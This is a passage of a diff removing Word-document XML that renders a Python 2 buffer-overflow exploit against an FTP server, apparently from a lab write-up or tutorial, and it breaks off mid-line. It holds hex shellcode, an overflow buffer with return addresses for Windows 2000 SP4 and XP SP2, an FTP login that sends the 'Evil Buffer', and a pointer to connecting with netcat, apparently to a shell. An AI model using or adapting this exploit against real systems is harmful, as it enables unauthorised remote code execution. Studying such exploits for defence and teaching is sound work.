-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>xcc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>\xc2"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Change RET address if need be.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>buffer = '\x41'*966+struct.pack('&lt;L', 0x7C2FA0F</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>7)+</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>'\x42'*32+sc # RET Windows 2000 Server SP4</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>#buffer = '\x41'*970+struct.pack('&lt;L', 0x7D17D</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>737)+</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>'\x42'*32+sc # RET Windows XP SP2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>try:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Edit the IP, Username and Password.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ftp = </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>FTP(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">'127.0.0.1') </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftp.login</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>('</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftp','ftp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>')</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nEvil</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Buffer sent..."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nTry</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> connecting with </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
